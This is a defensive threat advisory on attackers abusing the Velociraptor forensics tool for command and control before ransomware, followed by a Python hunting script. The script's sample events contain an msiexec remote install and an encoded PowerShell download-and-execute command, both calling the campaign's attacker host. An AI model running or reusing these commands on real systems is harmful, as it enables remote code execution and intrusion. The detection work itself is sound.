Velociraptor bites back: Digital forensics tool misused to deploy malware

Posted on 10 September 2025

What happened?

In August 2025, Sophos' Counter Threat Unit observed an attempted cyber intrusion [1] involving the deployment of Velociraptor - a legitimate open-source digital forensics and incident response (DFIR) tool - with the intention of creating a tunnel to a command and control (C2) server.

While attackers routinely abuse remote monitoring and management (RMM) tools, the use of Velociraptor marks a shift in tactics: instead of dropping custom-built malware to control the compromised host, the threat actor used a legitimate incident response tool as the remote access channel, reducing the malware footprint left on the system and making the activity harder to distinguish from a genuine security deployment.

Velociraptor is a tool designed to help organisations detect and respond to cyber threats across their estate, enabling security teams to collect forensic data and hunt for indicators of compromise (evidence suggesting unauthorised access or malicious activity). This makes it invaluable for both identifying atypical behaviour and conducting investigations within enterprise environments.

So what?

In this campaign, the threat actor used the Windows "msiexec" utility to download an installer from a Cloudflare Workers domain, which served as a staging area for several of the attacker's tools, including Cloudflare Tunnel (Cloudflare's tunnelling tool) and the remote administration tool Radmin. The installer contained the Velociraptor binary, pre-configured to communicate with the attacker's own server rather than a server controlled by the victim organisation.

Once that connection was established, the threat actor could then run a series of encoded PowerShell commands - scripts passed to PowerShell as a Base64 string, which hides the command text from casual log review and simple string matching - to download Visual Studio Code from the same staging domain, execute further commands and establish persistence on the compromised device.

What makes the above noteworthy is that none of this relies on a vulnerability in Velociraptor itself. The intrusion instead creatively abuses the tool's intended features - a client that calls home to a configured server and runs collection tasks it is sent - for malicious purposes.

Sophos' analysis concludes that this activity, had it been successful, would have likely led to the deployment of ransomware on the target system.

Ransomware typically encrypts critical data and disrupts essential business operations, often resulting in significant financial and reputational damage. Recovery from such an event may be prolonged, with potential costly legal and regulatory consequences if sensitive information is compromised.

What should I look out for?

Organisations are advised to monitor for unauthorised use of Velociraptor within their environment, treating any such unexpected activity as a potential precursor to ransomware.

Recommended actions include:

Review any activity logs for Velociraptor usage: when Velociraptor starts, the executable registers a new event log source named Velociraptor; this in turn creates a new key at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor. The key remains after the process has stopped, so it is a useful indicator both for live hunting and for retrospective investigations. If your organisation does not run Velociraptor, its presence on any host warrants immediate investigation; if you do, compare the installation and its configured server against your approved deployment.

Deploy endpoint detection and response (EDR) solutions: early detection is crucial; catching the attack before ransomware is deployed can greatly reduce its impact across your environment.

Monitor for unexpected tools and suspicious behaviour: application allow-listing, which limits installations to approved software, reduces your attack surface and minimises the foothold an attacker can gain with legitimate tools such as this one.

Block the known malicious indicators: to reduce the risk of exposure to this threat, consider using any available controls within your environment (DNS filtering, web proxy or firewall rules) to prevent access to the resources below, which have been identified as part of this campaign. Blocking only these attacker-controlled hosts ensures that any legitimate use of Velociraptor in your environment remains unaffected.

files[.]qaubctgg[.]workers[.]dev - Hosted tools

velo[.]qaubctgg[.]workers[.]dev - C2 server
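The script below is an added example, not code from the article or from Sophos, showing how the chain described under "So what?" and the indicators listed above translate into hunting logic over Sysmon-style events (Event ID 1 for process creation, 12/13 for registry changes). Only the two workers.dev hosts and the Velociraptor event log registry key come from the page; the sample events are constructed, and the file paths, the MSI name and the body of the decoded PowerShell script are assumptions made for illustration. It also decodes -EncodedCommand payloads (Base64 over UTF-16LE) so that URLs hidden inside them can be matched against the same indicator list.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Indicators quoted in the article, kept defanged as on the page and refanged
# only at match time so the list can be pasted straight from a report.
CAMPAIGN_HOSTS_DEFANGED = [
    "files[.]qaubctgg[.]workers[.]dev",  # hosted tools
    "velo[.]qaubctgg[.]workers[.]dev",   # C2 server
]
# Event log source key Velociraptor registers at start-up (HKLM form, as Sysmon logs it).
VELOCIRAPTOR_EVENTLOG_KEY = (
    r"HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor"
)

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# powershell.exe accepts -EncodedCommand, -enc, -ec and -e for a Base64 UTF-16LE script.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


CAMPAIGN_HOSTS = {refang(h).lower() for h in CAMPAIGN_HOSTS_DEFANGED}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (Base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hosts_in(text: str) -> set:
    return {h.lower() for h in URL_RE.findall(text)}


@dataclass
class Finding:
    rule: str
    event_index: int
    detail: str


def hunt(events: list) -> list:
    """Run the hunting rules over Sysmon-style event dicts and return Findings."""
    findings = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:  # process creation
            image = ev.get("Image", "").lower()
            cmd = ev.get("CommandLine", "")
            hosts = hosts_in(cmd)
            if image.endswith("msiexec.exe") and hosts:
                findings.append(Finding("msiexec_remote_install", i,
                                        f"installer fetched from {sorted(hosts)}"))
            if "velociraptor" in image or "velociraptor" in cmd.lower():
                findings.append(Finding("velociraptor_execution", i, cmd))
            if image.endswith(("powershell.exe", "pwsh.exe")):
                plain = decode_encoded_command(cmd)
                if plain is not None:
                    findings.append(Finding("encoded_powershell", i, plain.strip()))
                    hosts |= hosts_in(plain)  # match indicators inside the decoded script too
            if hosts & CAMPAIGN_HOSTS:
                findings.append(Finding("campaign_indicator", i,
                                        f"contacted {sorted(hosts & CAMPAIGN_HOSTS)}"))
        elif ev.get("EventID") in (12, 13):  # registry key created / value set
            target = ev.get("TargetObject", "").replace("HKEY_LOCAL_MACHINE", "HKLM")
            if target.lower().startswith(VELOCIRAPTOR_EVENTLOG_KEY.lower()):
                findings.append(Finding("velociraptor_eventlog_source", i, target))
    return findings


def sample_events() -> list:
    """Constructed events modelled on the chain in the article; paths, MSI name and script are made up."""
    stage2 = ("IEX (New-Object Net.WebClient).DownloadString("
              "'https://files.qaubctgg.workers.dev/stage2.ps1')")
    return [
        {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
         "CommandLine": "msiexec.exe /i https://files.qaubctgg.workers.dev/v.msi /qn"},
        {"EventID": 1, "Image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
         "CommandLine": r'"C:\Program Files\Velociraptor\Velociraptor.exe" --config client.config.yaml client'},
        {"EventID": 12, "EventType": "CreateKey", "TargetObject": VELOCIRAPTOR_EVENTLOG_KEY},
        {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_command(stage2)}"},
        {"EventID": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},  # benign
    ]


if __name__ == "__main__":
    for f in hunt(sample_events()):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

The velociraptor_execution and velociraptor_eventlog_source rules will of course also fire for an authorised deployment; in an environment that runs Velociraptor, feed the findings through an allow-list of approved installation paths and configured servers rather than treating every hit as hostile. The campaign_indicator rule is deliberately narrow (exact hosts only), which is why decoding the PowerShell payload before matching matters: the raw command line of the fourth sample event contains no URL at all.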
